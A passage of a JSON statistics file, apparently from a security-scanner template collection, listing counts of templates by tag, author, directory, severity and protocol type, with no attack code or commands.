avicon","count":2},{"name":"vcenter","count":2},{"name":"rockmongo","count":2},{"name":"liferay","count":2},{"name":"spark","count":2},{"name":"netsweeper","count":2},{"name":"storage","count":2},{"name":"jboss","count":2},{"name":"nextjs","count":2},{"name":"wuzhicms","count":2},{"name":"openfire","count":2},{"name":"natshell","count":2},{"name":"jsf","count":2},{"name":"s3","count":2},{"name":"db","count":2},{"name":"huawei","count":2},{"name":"dos","count":2},{"name":"axis2","count":2},{"name":"cve2005","count":2},{"name":"places","count":2},{"name":"plesk","count":2},{"name":"embed","count":2},{"name":"justwriting","count":2},{"name":"sitecore","count":2},{"name":"cache","count":2},{"name":"kentico","count":2},{"name":"emerge","count":2},{"name":"splunk","count":2},{"name":"qihang","count":2},{"name":"hashicorp","count":2},{"name":"waf","count":2},{"name":"adminer","count":2},{"name":"yii","count":2},{"name":"sharepoint","count":2},{"name":"chamilo","count":2},{"name":"service","count":2},{"name":"oauth","count":2},{"name":"axis","count":2},{"name":"trixbox","count":2},{"name":"chiyu","count":2},{"name":"getsimple","count":2},{"name":"kong","count":2},{"name":"aruba","count":2},{"name":"couchdb","count":2},{"name":"showdoc","count":2},{"name":"geowebserver","count":2},{"name":"backups","count":2},{"name":"mcafee","count":2},{"name":"hpe","count":2},{"name":"totemomail","count":2},{"name":"lotus","count":2},{"name":"ecology","count":2},{"name":"igs","count":2},{"name":"vrealize","count":2},{"name":"sonicwall","count":2},{"name":"akamai","count":2},{"name":"bucket","count":2},{"name":"harbor","count":2},{"name":"leak","count":2},{"name":"phpcollab","count":2},{"name":"flir","count":2},{"name":"wordfence","count":2},{"name":"rstudio","count":2},{"name":"horde","count":2},{"name":"heroku","count":2},{"name":"bypass","count":2},{"name":"smb","count":2},{"name":"sonarqube","count":2},{"name":"saltstack","count":2},{"name":"enumeration","count":2},{"name":"seeyon","count":2},{"name":"ucmdb","count":2},{"name":"mida","count":2},{"name":"qcubed","count":2},{"name":"glassfish","count":2},{"name":"guacamole","count":2},{"name":"payara","count":2},{"name":"electron","count":2},{"name":"hjtcloud","count":2},{"name":"ec2","count":2},{"name":"linux","count":2},{"name":"ecoa","count":2},{"name":"akkadian","count":2},{"name":"rancher","count":2},{"name":"grav","count":2},{"name":"jeedom","count":2},{"name":"minio","count":2},{"name":"frp","count":2},{"name":"shellshock","count":2},{"name":"tidb","count":2},{"name":"bruteforce","count":2},{"name":"status","count":2},{"name":"pega","count":2},{"name":"avantfax","count":2},{"name":"prestashop","count":2},{"name":"nextcloud","count":2},{"name":"middleware","count":2},{"name":"xxljob","count":2},{"name":"interlib","count":1},{"name":"memcached","count":1},{"name":"avtech","count":1},{"name":"nps","count":1},{"name":"apiman","count":1},{"name":"syslog","count":1},{"name":"wondercms","count":1},{"name":"novnc","count":1},{"name":"linkedin","count":1},{"name":"directions","count":1},{"name":"instagram","count":1},{"name":"parentlink","count":1},{"name":"nimble","count":1},{"name":"dom","count":1},{"name":"axiom","count":1},{"name":"74cms","count":1},{"name":"qsan","count":1},{"name":"b2evolution","count":1},{"name":"geddy","count":1},{"name":"domxss","count":1},{"name":"panabit","count":1},{"name":"tpshop","count":1},{"name":"perl","count":1},{"name":"buildkite","count":1},{"name":"shopizer","count":1},{"name":"st","count":1},{"name":"sureline","count":1},{"name":"mantisbt","count":1},{"name":"moin","count":1},{"name":"clockwork","count":1},{"name":"openemr","count":1},{"name":"zmanda","count":1},{"name":"embedthis","count":1},{"name":"moinmoin","count":1},{"name":"exacqvision","count":1},{"name":"xmlchart","count":1},{"name":"cve2006","count":1},{"name":"kerbynet","count":1},{"name":"beanshell","count":1},{"name":"websvn","count":1},{"name":"codemeter","count":1},{"name":"youtube","count":1},{"name":"wooyun","count":1},{"name":"zms","count":1},{"name":"woocommerce","count":1},{"name":"details","count":1},{"name":"yealink","count":1},{"name":"nsasg","count":1},{"name":"daybyday","count":1},{"name":"openweather","count":1},{"name":"mantis","count":1},{"name":"synnefo","count":1},{"name":"mpsec","count":1},{"name":"expose","count":1},{"name":"wifisky","count":1},{"name":"placeos","count":1},{"name":"clickhouse","count":1},{"name":"cgi","count":1},{"name":"geocode","count":1},{"name":"shopware","count":1},{"name":"azkaban","count":1},{"name":"jnoj","count":1},{"name":"mongoshake","count":1},{"name":"ioncube","count":1},{"name":"csrf","count":1},{"name":"burp","count":1},{"name":"opensmtpd","count":1},{"name":"traefik","count":1},{"name":"empirecms","count":1},{"name":"pippoint","count":1},{"name":"setup","count":1},{"name":"ambari","count":1},{"name":"smartsense","count":1},{"name":"emby","count":1},{"name":"actuator","count":1},{"name":"skycaiji","count":1},{"name":"omi","count":1},{"name":"darkstat","count":1},{"name":"soar","count":1},{"name":"iterable","count":1},{"name":"rujjie","count":1},{"name":"beanstalk","count":1},{"name":"cors","count":1},{"name":"xiuno","count":1},{"name":"nexusdb","count":1},{"name":"find","count":1},{"name":"wavlink","count":1},{"name":"jumpcloud","count":1},{"name":"fedora","count":1},{"name":"cyberoam","count":1},{"name":"cve202","count":1},{"name":"dvr","count":1},{"name":"clink-office","count":1},{"name":"floc","count":1},{"name":"landray","count":1},{"name":"weglot","count":1},{"name":"rmi","count":1},{"name":"spectracom","count":1},{"name":"lighttpd","count":1},{"name":"bingmaps","count":1},{"name":"shopxo","count":1},{"name":"phpinfo","count":1},{"name":"iptime","count":1},{"name":"skywalking","count":1},{"name":"square","count":1},{"name":"feifeicms","count":1},{"name":"minimouse","count":1},{"name":"mobileiron","count":1},{"name":"phpfusion","count":1},{"name":"labtech","count":1},{"name":"fortigates","count":1},{"name":"vsftpd","count":1},{"name":"spip","count":1},{"name":"livezilla","count":1},{"name":"tectuus","count":1},{"name":"haproxy","count":1},{"name":"postmark","count":1},{"name":"loqate","count":1},{"name":"tjws","count":1},{"name":"pmb","count":1},{"name":"ewebs","count":1},{"name":"lanproxy","count":1},{"name":"tor","count":1},{"name":"codeigniter","count":1},{"name":"xvr","count":1},{"name":"visualstudio","count":1},{"name":"gilacms","count":1},{"name":"fastapi","count":1},{"name":"sophos","count":1},{"name":"contentkeeper","count":1},{"name":"kyan","count":1},{"name":"hiawatha","count":1},{"name":"gunicorn","count":1},{"name":"mautic","count":1},{"name":"oscommerce","count":1},{"name":"qvisdvr","count":1},{"name":"rdp","count":1},{"name":"redwood","count":1},{"name":"maxsite","count":1},{"name":"zend","count":1},{"name":"svnserve","count":1},{"name":"etherpad","count":1},{"name":"maccmsv10","count":1},{"name":"craftcms","count":1},{"name":"roads","count":1},{"name":"expressjs","count":1},{"name":"szhe","count":1},{"name":"fortinet","count":1},{"name":"fortilogger","count":1},{"name":"bookstack","count":1},{"name":"ueditor","count":1},{"name":"ssl","count":1},{"name":"cofax","count":1},{"name":"twitter-server","count":1},{"name":"alertmanager","count":1},{"name":"ntopng","count":1},{"name":"database","count":1},{"name":"commscope","count":1},{"name":"arl","count":1},{"name":"javamelody","count":1},{"name":"cobub","count":1},{"name":"faraday","count":1},{"name":"monitorix","count":1},{"name":"circle","count":1},{"name":"email","count":1},{"name":"office365","count":1},{"name":"travis","count":1},{"name":"dbeaver","count":1},{"name":"upnp","count":1},{"name":"buttercms","count":1},{"name":"gitea","count":1},{"name":"owasp","count":1},{"name":"esmtp","count":1},{"name":"monitorr","count":1},{"name":"okiko","count":1},{"name":"trane","count":1},{"name":"blue-ocean","count":1},{"name":"totaljs","count":1},{"name":"varnish","count":1},{"name":"nedi","count":1},{"name":"doh","count":1},{"name":"secmail","count":1},{"name":"tapestry","count":1},{"name":"lokalise","count":1},{"name":"myucms","count":1},{"name":"lutron","count":1},{"name":"smi","count":1},{"name":"sar2html","count":1},{"name":"xml","count":1},{"name":"bing","count":1},{"name":"nc2","count":1},{"name":"keenetic","count":1},{"name":"distance","count":1},{"name":"etouch","count":1},{"name":"sonarcloud","count":1},{"name":"sendgrid","count":1},{"name":"loganalyzer","count":1},{"name":"timeclock","count":1},{"name":"redis","count":1},{"name":"cherokee","count":1},{"name":"rsyncd","count":1},{"name":"fuelcms","count":1},{"name":"calendarix","count":1},{"name":"centos","count":1},{"name":"playable","count":1},{"name":"k8s","count":1},{"name":"spotify","count":1},{"name":"spidercontrol","count":1},{"name":"elevation","count":1},{"name":"tieline","count":1},{"name":"kindeditor","count":1},{"name":"pcoip","count":1},{"name":"phpfastcache","count":1},{"name":"triconsole","count":1},{"name":"sidekiq","count":1},{"name":"natemail","count":1},{"name":"jquery","count":1},{"name":"grails","count":1},{"name":"pihole","count":1},{"name":"chevereto","count":1},{"name":"tugboat","count":1},{"name":"scimono","count":1},{"name":"messaging","count":1},{"name":"nette","count":1},{"name":"optiLink","count":1},{"name":"netrc","count":1},{"name":"idemia","count":1},{"name":"ns","count":1},{"name":"opencast","count":1},{"name":"visualtools","count":1},{"name":"yachtcontrol","count":1},{"name":"alerta","count":1},{"name":"zcms","count":1},{"name":"pacsone","count":1},{"name":"pgadmin","count":1},{"name":"nuuo","count":1},{"name":"centreon","count":1},{"name":"lotuscms","count":1},{"name":"webui","count":1},{"name":"sqlite","count":1},{"name":"spring","count":1},{"name":"salesforce","count":1},{"name":"okta","count":1},{"name":"gridx","count":1},{"name":"cocoon","count":1},{"name":"opentsdb","count":1},{"name":"api-manager","count":1},{"name":"tenda","count":1},{"name":"zarafa","count":1},{"name":"listserv","count":1},{"name":"kubeflow","count":1},{"name":"mrtg","count":1},{"name":"goahead","count":1},{"name":"saltapi","count":1},{"name":"timesheet","count":1},{"name":"cves2001","count":1},{"name":"flink","count":1},{"name":"fortiweb","count":1},{"name":"exponentcms","count":1},{"name":"clockwatch","count":1},{"name":"ruckus","count":1},{"name":"woocomernce","count":1},{"name":"rubedo","count":1},{"name":"dvwa","count":1},{"name":"mailgun","count":1},{"name":"graphql","count":1},{"name":"zm","count":1},{"name":"graph","count":1},{"name":"trilithic","count":1},{"name":"glowroot","count":1},{"name":"javafaces","count":1},{"name":"netgenie","count":1},{"name":"miscrsoft","count":1},{"name":"werkzeug","count":1},{"name":"openrestry","count":1},{"name":"rabbitmq","count":1},{"name":"ognl","count":1},{"name":"asana","count":1},{"name":"scs","count":1},{"name":"owa","count":1},{"name":"k8","count":1},{"name":"solarlog","count":1},{"name":"cloudinary","count":1},{"name":"wakatime","count":1},{"name":"fortigate","count":1},{"name":"xunchi","count":1},{"name":"springframework","count":1},{"name":"timezone","count":1},{"name":"proftpd","count":1},{"name":"redcap","count":1},{"name":"expn","count":1},{"name":"netdata","count":1},{"name":"cscart","count":1},{"name":"bedita","count":1},{"name":"qdpm","count":1},{"name":"sourcebans","count":1},{"name":"blind","count":1},{"name":"wmt","count":1},{"name":"karel","count":1},{"name":"majordomo2","count":1},{"name":"stem","count":1},{"name":"cloudflare","count":1},{"name":"jfrog","count":1},{"name":"spf","count":1},{"name":"ecom","count":1},{"name":"gateone","count":1},{"name":"place","count":1},{"name":"svn","count":1},{"name":"vsphere","count":1},{"name":"raspap","count":1},{"name":"sco","count":1},{"name":"phpwiki","count":1},{"name":"meraki","count":1},{"name":"rockethchat","count":1},{"name":"selea","count":1},{"name":"nifi","count":1},{"name":"asus","count":1},{"name":"argussurveillance","count":1},{"name":"flexbe","count":1},{"name":"ilo4","count":1},{"name":"node-red-dashboard","count":1},{"name":"limit","count":1},{"name":"episerver","count":1},{"name":"fcm","count":1},{"name":"htmli","count":1},{"name":"stripe","count":1},{"name":"thinkadmin","count":1},{"name":"magicflow","count":1},{"name":"sarg","count":1},{"name":"dotclear","count":1},{"name":"vnc","count":1},{"name":"jsp","count":1},{"name":"razor","count":1},{"name":"pendo","count":1},{"name":"duomicms","count":1},{"name":"processmaker","count":1},{"name":"ruby","count":1},{"name":"starttls","count":1},{"name":"phpunit","count":1},{"name":"gurock","count":1},{"name":"wazuh","count":1},{"name":"fastcgi","count":1},{"name":"terraform","count":1},{"name":"lancom","count":1},{"name":"hadoop","count":1},{"name":"pivotaltracker","count":1},{"name":"biometrics","count":1},{"name":"javascript","count":1},{"name":"mapbox","count":1},{"name":"mod-proxy","count":1},{"name":"openstack","count":1},{"name":"websphere","count":1},{"name":"klog","count":1},{"name":"concrete","count":1},{"name":"rocketchat","count":1},{"name":"turbocrm","count":1},{"name":"phpshowtime","count":1},{"name":"checkpoint","count":1},{"name":"smartblog","count":1},{"name":"pyramid","count":1},{"name":"nomad","count":1},{"name":"dropbox","count":1},{"name":"wamp","count":1},{"name":"digitalocean","count":1},{"name":"netmask","count":1},{"name":" default-login","count":1},{"name":"mkdocs","count":1},{"name":"webmodule-ee","count":1},{"name":"metinfo","count":1},{"name":"avalanche","count":1},{"name":"xdcms","count":1},{"name":"panos","count":1},{"name":"manager","count":1},{"name":"deviantart","count":1},{"name":"redmine","count":1},{"name":"zeroshell","count":1},{"name":"whm","count":1},{"name":"sangfor","count":1},{"name":"myvuehelp","count":1},{"name":"achecker","count":1},{"name":"auth","count":1},{"name":"apos","count":1},{"name":"openx","count":1},{"name":"discord","count":1},{"name":"camunda","count":1},{"name":"eyelock","count":1},{"name":"sentry","count":1},{"name":"tcexam","count":1},{"name":"dnssec","count":1},{"name":"adb","count":1},{"name":"ems","count":1},{"name":"rmc","count":1},{"name":"comodo","count":1},{"name":"imap","count":1},{"name":"h3c-imc","count":1},{"name":"basic-auth","count":1},{"name":"anchorcms","count":1},{"name":"discourse","count":1},{"name":"mara","count":1},{"name":"photo","count":1},{"name":"plugin","count":1},{"name":"froxlor","count":1},{"name":"postgres","count":1},{"name":"shiro","count":1},{"name":"servicedesk","count":1},{"name":"blackboard","count":1},{"name":"opm","count":1},{"name":"nerdgraph","count":1},{"name":"bigbluebutton","count":1},{"name":"jenkin","count":1},{"name":"yzmcms","count":1},{"name":"remkon","count":1},{"name":"eprints","count":1},{"name":"cloudron","count":1},{"name":"oneblog","count":1},{"name":"weiphp","count":1},{"name":"openerp","count":1},{"name":"emc","count":1},{"name":"jeewms","count":1},{"name":"matrix","count":1},{"name":"phalcon","count":1},{"name":"octoprint","count":1},{"name":"pulsesecure","count":1},{"name":"landrayoa","count":1},{"name":"circontrol","count":1},{"name":"metabase","count":1},{"name":"sage","count":1},{"name":"aspnuke","count":1},{"name":"jitsi","count":1},{"name":"mirai","count":1},{"name":"mediumish","count":1},{"name":"wiki","count":1},{"name":"vidyo","count":1},{"name":"clave","count":1},{"name":"diris","count":1},{"name":"clusterengine","count":1},{"name":"dompdf","count":1},{"name":"sceditor","count":1},{"name":"cockpit","count":1},{"name":"robomongo","count":1},{"name":"extractor","count":1},{"name":"twitter","count":1},{"name":"powercreator","count":1},{"name":"seacms","count":1},{"name":"cse","count":1},{"name":"iceflow","count":1},{"name":"nearby","count":1},{"name":"postmessage","count":1},{"name":"sql","count":1},{"name":"appweb","count":1},{"name":"ganglia","count":1},{"name":"route","count":1},{"name":"simplecrm","count":1},{"name":"gogs","count":1},{"name":"tileserver","count":1},{"name":"ulterius","count":1},{"name":"ghost","count":1},{"name":"webftp","count":1},{"name":"jaspersoft","count":1},{"name":"luftguitar","count":1},{"name":"jmx","count":1},{"name":"streetview","count":1},{"name":"chinaunicom","count":1},{"name":"webadmin","count":1},{"name":"influxdb","count":1},{"name":"tensorboard","count":1},{"name":"sprintful","count":1},{"name":"shoretel","count":1},{"name":"huijietong","count":1},{"name":"newrelic","count":1},{"name":"eg","count":1},{"name":"primetek","count":1},{"name":"webmin","count":1},{"name":"circontrorl","count":1},{"name":"frontpage","count":1},{"name":"zookeeper","count":1},{"name":"gstorage","count":1},{"name":"pagespeed","count":1},{"name":"viewlinc","count":1},{"name":"octobercms","count":1},{"name":"sgp","count":1},{"name":"nuxeo","count":1},{"name":"circleci","count":1},{"name":"visionhub","count":1},{"name":"bullwark","count":1},{"name":"wavemaker","count":1},{"name":"panasonic","count":1},{"name":"realteo","count":1},{"name":"ssltls","count":1},{"name":"artica","count":1},{"name":"wildfly","count":1},{"name":"bazarr","count":1},{"name":"subrion","count":1},{"name":"plc","count":1},{"name":"crm","count":1},{"name":"nordex","count":1},{"name":"tinypng","count":1},{"name":"autocomplete","count":1},{"name":"swagger","count":1},{"name":"socomec","count":1},{"name":"fiori","count":1},{"name":"package","count":1},{"name":"alibaba","count":1},{"name":"portainer","count":1},{"name":"mongo","count":1},{"name":"mdb","count":1},{"name":"ricoh","count":1},{"name":"oidc","count":1},{"name":"csrfguard","count":1},{"name":"rhymix","count":1},{"name":"key","count":1},{"name":"acontent","count":1},{"name":"tika","count":1},{"name":"vscode","count":1},{"name":"tamronos","count":1},{"name":"eyou","count":1},{"name":"calendly","count":1},{"name":"solman","count":1},{"name":"hubspot","count":1},{"name":"ipstack","count":1},{"name":"zenario","count":1},{"name":"mysql","count":1},{"name":"zyxel","count":1},{"name":"elfinder","count":1},{"name":"gotmls","count":1},{"name":"locations","count":1},{"name":"hiboss","count":1},{"name":"krweb","count":1},{"name":"drone","count":1},{"name":"aura","count":1},{"name":"olivetti","count":1},{"name":"gitlist","count":1},{"name":"cerebro","count":1},{"name":"mariadb","count":1},{"name":"elascticsearch","count":1},{"name":"accela","count":1},{"name":"acme","count":1},{"name":"bolt","count":1},{"name":"acexy","count":1},{"name":"motorola","count":1},{"name":"graylog","count":1},{"name":"erp-nc","count":1},{"name":"viewpoint","count":1},{"name":"xampp","count":1},{"name":"dotnet","count":1},{"name":"logontracer","count":1},{"name":"plone","count":1},{"name":"redhat","count":1},{"name":"geutebruck","count":1},{"name":"tongda","count":1},{"name":"addpac","count":1},{"name":"linksys","count":1},{"name":"gespage","count":1},{"name":"speed","count":1},{"name":"hortonworks","count":1},{"name":"jenzabar","count":1},{"name":"kafdrop","count":1},{"name":"zzzcms","count":1},{"name":"weather","count":1},{"name":"adiscon","count":1},{"name":"servicenow","count":1},{"name":"tracer","count":1},{"name":"announcekit","count":1},{"name":"tensorflow","count":1},{"name":"csod","count":1},{"name":"dotnetnuke","count":1},{"name":"elasticsearch","count":1},{"name":"graphite","count":1},{"name":"zte","count":1},{"name":"glances","count":1},{"name":"default","count":1},{"name":"opensns","count":1},{"name":"shoppable","count":1},{"name":"uwsgi","count":1},{"name":"testrail","count":1},{"name":"couchbase","count":1},{"name":"plastic","count":1},{"name":"pagerduty","count":1},{"name":"gloo","count":1},{"name":"gsoap","count":1},{"name":"finereport","count":1},{"name":"bash","count":1},{"name":"lg-nas","count":1},{"name":"geolocation","count":1},{"name":"wing-ftp","count":1},{"name":"resourcespace","count":1},{"name":"nweb2fax","count":1}],"authors":[{"name":"daffainfo","count":288},{"name":"pikpikcu","count":281},{"name":"dhiyaneshdk","count":279},{"name":"pdteam","count":201},{"name":"geeknik","count":162},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":66},{"name":"zzeitlin","count":63},{"name":"madrobot","count":63},{"name":"0x_akoko","count":53},{"name":"gaurang","count":42},{"name":"philippedelteil","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"nadino","count":10},{"name":"melbadry9","count":10},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"hackergautam","count":9},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"dogasantos","count":7},{"name":"dr_set","count":7},{"name":"0x240x23elu","count":7},{"name":"oppsec","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"meme-lord","count":7},{"name":"techryptic (@tech)","count":7},{"name":"divya_mudgal","count":6},{"name":"__fazal","count":6},{"name":"logicalhunter","count":6},{"name":"puzzlepeaches","count":6},{"name":"caspergn","count":6},{"name":"pentest_swissky","count":6},{"name":"xelkomy","count":5},{"name":"rootxharsh","count":5},{"name":"joanbono","count":5},{"name":"johnk3r","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"elsfa7110","count":5},{"name":"lu4nx","count":5},{"name":"panch0r3d","count":5},{"name":"iamnoooob","count":5},{"name":"wisnupramoedya","count":4},{"name":"tess","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"incogbyte","count":4},{"name":"nodauf","count":4},{"name":"idealphase","count":3},{"name":"shine","count":3},{"name":"me9187","count":3},{"name":"thomas_from_offensity","count":3},{"name":"shifacyclewala","count":3},{"name":"mavericknerd","count":3},{"name":"z3bd","count":3},{"name":"fyoorer","count":3},{"name":"sullo","count":3},{"name":"dudez","count":3},{"name":"jarijaas","count":3},{"name":"emenalf","count":3},{"name":"johnjhacking","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"0w4ys","count":3},{"name":"skeltavik","count":3},{"name":"unstabl3","count":3},{"name":"f1tz","count":3},{"name":"impramodsargar","count":3},{"name":"sushantkamble","count":3},{"name":"vsh00t","count":3},{"name":"_generic_human_","count":3},{"name":"binaryfigments","count":3},{"name":"socketz","count":2},{"name":"lotusdll","count":2},{"name":"bing0o","count":2},{"name":"nkxxkn","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"0xsapra","count":2},{"name":"joeldeleep","count":2},{"name":"manas_harsh","count":2},{"name":"hahwul","count":2},{"name":"davidmckennirey","count":2},{"name":"bernardofsr","count":2},{"name":"0xelkomy","count":2},{"name":"random-robbie","count":2},{"name":"swissky","count":2},{"name":"arcc","count":2},{"name":"hetroublemakr","count":2},{"name":"vavkamil","count":2},{"name":"r12w4n","count":2},{"name":"pxmme1337","count":2},{"name":"0xrudra","count":2},{"name":"huowuzhao","count":2},{"name":"fabaff","count":2},{"name":"randomrobbie","count":2},{"name":"foulenzer","count":2},{"name":"bp0lr","count":2},{"name":"g4l1t0","count":2},{"name":"x1m_martijn","count":2},{"name":"amsda","count":2},{"name":"afaq","count":2},{"name":"0xprial","count":2},{"name":"parth","count":2},{"name":"0xcrypto","count":2},{"name":"koti2","count":2},{"name":"bsysop","count":2},{"name":"dheerajmadhukar","count":2},{"name":"kiblyn11","count":2},{"name":"convisoappsec","count":2},{"name":"0xsmiley","count":2},{"name":"udit_thakkur","count":2},{"name":"w4cky_","count":2},{"name":"alifathi-h1","count":2},{"name":"ree4pwn","count":2},{"name":"whoever","count":2},{"name":"gevakun","count":2},{"name":"r3naissance","count":2},{"name":"mohammedsaneem","count":2},{"name":"sy3omda","count":2},{"name":"cocxanh","count":2},{"name":"zomsop82","count":2},{"name":"ehsahil","count":2},{"name":"gal nagli","count":2},{"name":"moritz nentwig","count":2},{"name":"ajaysenr","count":1},{"name":"un-fmunozs","count":1},{"name":"adrianmf","count":1},{"name":"rodnt","count":1},{"name":"borna nematzadeh","count":1},{"name":"brabbit10","count":1},{"name":"nerrorsec","count":1},{"name":"regala_","count":1},{"name":"@ofjaaah","count":1},{"name":"akash.c","count":1},{"name":"ahmetpergamum","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"geraldino2","count":1},{"name":"izn0u","count":1},{"name":"co0nan","count":1},{"name":"_c0wb0y_","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"makyotox","count":1},{"name":"orpheus","count":1},{"name":"0ut0fb4nd","count":1},{"name":"0xtavian","count":1},{"name":"mubassirpatel","count":1},{"name":"exploitation","count":1},{"name":"jrolf","count":1},{"name":"akshansh","count":1},{"name":"thebinitghimire","count":1},{"name":"retr0","count":1},{"name":"mesaglio","count":1},{"name":"bolli95","count":1},{"name":"furkansenan","count":1},{"name":"willd96","count":1},{"name":"its0x08","count":1},{"name":"mah3sec_","count":1},{"name":"affix","count":1},{"name":"flag007","count":1},{"name":"berkdusunur","count":1},{"name":"yashgoti","count":1},{"name":"push4d","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"hanlaomo","count":1},{"name":"shreyapohekar","count":1},{"name":"becivells","count":1},{"name":"kareemse1im","count":1},{"name":"alperenkesk","count":1},{"name":"j33n1k4","count":1},{"name":"nytr0gen","count":1},{"name":"pratik khalane","count":1},{"name":"jteles","count":1},{"name":"ooooooo_q","count":1},{"name":"b0yd","count":1},{"name":"pudsec","count":1},{"name":"d0rkerdevil","count":1},{"name":"hakluke","count":1},{"name":"petruknisme","count":1},{"name":"raesene","count":1},{"name":"nvn1729","count":1},{"name":"alex","count":1},{"name":"juicypotato1","count":1},{"name":"aresx","count":1},{"name":"0xteles","count":1},{"name":"manuelbua","count":1},{"name":"naglinagli","count":1},{"name":"absshax","count":1},{"name":"rotemreiss","count":1},{"name":"0xrod","count":1},{"name":"zhenwarx","count":1},{"name":"yashanand155","count":1},{"name":"ohlinge","count":1},{"name":"apt-mirror","count":1},{"name":"kurohost","count":1},{"name":"jeya seelan","count":1},{"name":"iampritam","count":1},{"name":"streetofhackerr007","count":1},{"name":"xstp","count":1},{"name":"alph4byt3","count":1},{"name":"kabirsuda","count":1},{"name":"revblock","count":1},{"name":"whynotke","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"th3.d1p4k","count":1},{"name":"0xd0ff9","count":1},{"name":"tirtha_mandal","count":1},{"name":"taielab","count":1},{"name":"sicksec","count":1},{"name":"cristi vlad (@cristivlad25)","count":1},{"name":"forgedhallpass","count":1},{"name":"cookiehanhoan","count":1},{"name":"blckraven","count":1},{"name":"philippdelteil","count":1},{"name":"intx0x80","count":1},{"name":"luskabol","count":1},{"name":"chron0x","count":1},{"name":"elmahdi","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sec_hawk","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"toufik airane","count":1},{"name":"elder tao","count":1},{"name":"sickwell","count":1},{"name":"0h1in9e","count":1},{"name":"shifacyclewla","count":1},{"name":"mhdsamx","count":1},{"name":"shelld3v","count":1},{"name":"pdp","count":1},{"name":"droberson","count":1},{"name":"qlkwej","count":1},{"name":"noamrathaus","count":1},{"name":"oscarintherocks","count":1},{"name":"vzamanillo","count":1},{"name":"rojanrijal","count":1},{"name":"ahmed sherif","count":1},{"name":"s1r1u5_","count":1},{"name":"daviey","count":1},{"name":"schniggie","count":1},{"name":"@dwisiswant0","count":1},{"name":"bjhulst","count":1},{"name":"bad5ect0r","count":1},{"name":"evolutionsec","count":1},{"name":"ilovebinbash","count":1},{"name":"lark lab","count":1},{"name":"kre80r","count":1},{"name":"clarkvoss","count":1},{"name":"b4uh0lz","count":1},{"name":"patralos","count":1},{"name":"udyz","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"ringo","count":1},{"name":"wabafet","count":1},{"name":"andirrahmani1","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"micha3lb3n","count":1},{"name":"soyelmago","count":1},{"name":"fmunozs","count":1},{"name":"_darrenmartyn","count":1},{"name":"c3l3si4n","count":1},{"name":"undefl0w","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"knassar702","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"notsoevilweasel","count":1},{"name":"ipanda","count":1},{"name":"thezakman","count":1},{"name":"defr0ggy","count":1},{"name":"elouhi","count":1},{"name":"52971","count":1},{"name":"andysvints","count":1},{"name":"deena","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"thevillagehacker","count":1},{"name":"b0rn2r00t","count":1},{"name":"luci","count":1},{"name":"mass0ma","count":1},{"name":"x6263","count":1},{"name":"_harleo","count":1},{"name":"gboddin","count":1},{"name":"ldionmarcil","count":1},{"name":"zandros0","count":1},{"name":"tim_koopmans","count":1},{"name":"smaranchand","count":1},{"name":"yavolo","count":1},{"name":"fopina","count":1},{"name":"dawid-czarnecki","count":1},{"name":"remonsec","count":1},{"name":"sshell","count":1},{"name":"infosecsanyam","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"omarkurt","count":1},{"name":"@github.com/defr0ggy","count":1}],"directory":[{"name":"cves","count":837},{"name":"vulnerabilities","count":327},{"name":"exposed-panels","count":269},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":141},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":60},{"name":"file","count":50},{"name":"workflows","count":38},{"name":"network","count":32},{"name":"iot","count":27},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":749},{"name":"high","count":649},{"name":"medium","count":476},{"name":"critical","count":294},{"name":"low","count":155}],"types":[{"name":"http","count":2211},{"name":"file","count":50},{"name":"network","count":45},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":838},{"name":"lfi","count":344},{"name":"panel","count":284},{"name":"xss","count":259},{"name":"wordpress","count":255},{"name":"exposure","count":245},{"name":"rce","count":215},{"name":"tech","count":196},{"name":"wp-plugin","count":178},{"name":"cve2020","count":166},{"name":"cve2021","count":157},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"config","count":99},{"name":"cve2019","count":98},{"name":"cve2018","count":92},{"name":"iot","count":79},{"name":"apache","count":73},{"name":"oast","count":70},{"name":"takeover","count":69},{"name":"default-login","count":68},{"name":"token","count":67},{"name":"token-spray","count":63},{"name":"cve2017","count":51},{"name":"file","count":50},{"name":"unauth","count":49},{"name":"network","count":44},{"name":"ssrf","count":42},{"name":"sqli","count":40},{"name":"","count":39},{"name":"cve2016","count":38},{"name":"redirect","count":38},{"name":"oracle","count":37},{"name":"logs","count":30},{"name":"google","count":30},{"name":"atlassian","count":29},{"name":"cve2015","count":29},{"name":"jira","count":29},{"name":"listing","count":27},{"name":"cisco","count":27},{"name":"cve2014","count":27},{"name":"auth-bypass","